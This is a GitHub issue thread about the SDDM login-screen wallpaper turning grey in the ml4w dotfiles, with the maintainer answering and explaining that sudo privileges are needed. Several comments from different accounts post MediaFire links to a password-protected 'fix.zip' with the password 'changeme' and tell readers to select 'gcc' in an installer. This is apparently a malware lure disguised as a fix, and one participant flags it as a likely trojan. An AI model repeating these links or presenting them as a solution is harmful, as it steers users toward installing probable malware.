### ISSUE TITLE
How to change SDDM wallpaper?

### ISSUE THREAD

**Issue by PSGitHubUser1** [mylinuxforwork/dotfiles#186]
@mylinuxforwork 

I tried to change the wallpaper of SDDM with Ml4w welcome app with 'Set current wallpaper as SDDM wallpaper', it says done but on rebooting, nothing happens and plus, the default wallpaper (Sun, Space one?) disappears & It shows grey colour as SDDM background wallpaper.

LITERALLY SOLID GREY.

And to fix this, I had to reinstall dotfile

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PSGitHubUser1** [comment]
> Download 
> https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

What's this?

Smells like a Virus.. hmm fishy...

@mylinuxforwork Its a Virus, I guess? I mean the way he/she gave zip & password of it.. feels fishy to me. 

It is Phishing or Trojan or DDOS 😂?

**Comment by mylinuxforwork** [comment]
> > Download
> > https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
> > password: changeme
> > In the installer menu, select "gcc."
> 
> What's this?
> 
> Smells like a Virus.. hmm fishy...
> 
> @mylinuxforwork Its a Virus, I guess? I mean the way he/she gave zip & password of it.. feels fishy to me.
> 
> It is Phishing or Trojan or DDOS 😂?

Where does this come from?

**Comment by mylinuxforwork** [comment]
@PSGitHubUser1 Just tested it with the latest 2.9.6. Works fine on my system.
Can you please update to the latest version as AUR?
https://github.com/mylinuxforwork/dotfiles/wiki/Update

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PSGitHubUser1** [comment]
> @PSGitHubUser1 Just tested it with the latest 2.9.6. Works fine on my system.
> Can you please update to the latest version as AUR?
> https://github.com/mylinuxforwork/dotfiles/wiki/Update
> 
> 

I don't know, can't test right but there should be a setting to change SDDM wallpaper as not everyone can just change wallpaper of pc (changing wallpaper changes the theme too) and do 'Set current wallpaper as SDDM wallpaper'

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mylinuxforwork** [comment]
@PSGitHubUser1 The function is already there: 
![image](https://github.com/user-attachments/assets/629ae0d9-23b7-44dd-b97c-835b53028aa7)

But maybe a bit hidden.

**Comment by PSGitHubUser1** [comment]
> @PSGitHubUser1 The function is already there: 
> ![image](https://github.com/user-attachments/assets/629ae0d9-23b7-44dd-b97c-835b53028aa7)
> 
> But maybe a bit hidden.

No I mean is there any option to change SDDM wallpaper like we do for desktop.

OR Is there any way to change SDDM wallpaper using hyprpaper or swww/ewww idk.?

**Comment by mylinuxforwork** [comment]
> > @PSGitHubUser1 The function is already there:
> > ![image](https://private-user-images.githubusercontent.com/145253254/361843369-629ae0d9-23b7-44dd-b97c-835b53028aa7.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4NTkyMjEsIm5iZiI6MTcyNDg1ODkyMSwicGF0aCI6Ii8xNDUyNTMyNTQvMzYxODQzMzY5LTYyOWFlMGQ5LTIzYjctNDRkZC1iOTdjLTgzNWI1MzAyOGFhNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyOFQxNTI4NDFaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lNDU1YTE4YzdlMzY0N2FiZGU1MDViNDQ2N2Y3M2M5OGE1ODJiMTM1YWMyNGQ3MzE2NTRjNTMzNDg1OWNiNTZiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.fjCAhlsTqlHbYzZyxBXsDyWhmJiAPEsAEi7oeMaL690)
> > But maybe a bit hidden.
> 
> No I mean is there any option to change SDDM wallpaper like we do for desktop.
> 
> OR Is there any way to change SDDM wallpaper using hyprpaper or swww/ewww idk.?

No. This is technically not possible because changing the wallpaper in sddm requires sudo privileges.

**Comment by PSGitHubUser1** [comment]
> No. This is technically not possible because changing the wallpaper in sddm requires sudo privileges. 

What's wrong then? User will just type its password? 

you mean like `sudo yay -S vim`?

**Comment by mylinuxforwork** [comment]
Yes. And you need sudo privileges to copy a wallpaper into the target folder of sddm. It is not possible to reference to an image in the home directory.

**Comment by mylinuxforwork** [comment]
Just tested again on EndeavourOS. Everything is working as expected. You can change the wallpaper with the welcome app.

**Comment by FullStackPete** [comment]
Hi! Same issue here. I tried setting a new wallpaper with a few tweaks in files, but it didn't work - my wallpaper went gray. Then I reverted the changes (I tried changing file path in theme.conf, but then reverted changes to path "backgrounds/CURRENTWALLPAPER"). I then tried changing wallpaper with ml4w welcome app but my sddm background is still gray.
I'm using arch linux. Any ideas what went wrong and how to change wallpaper?
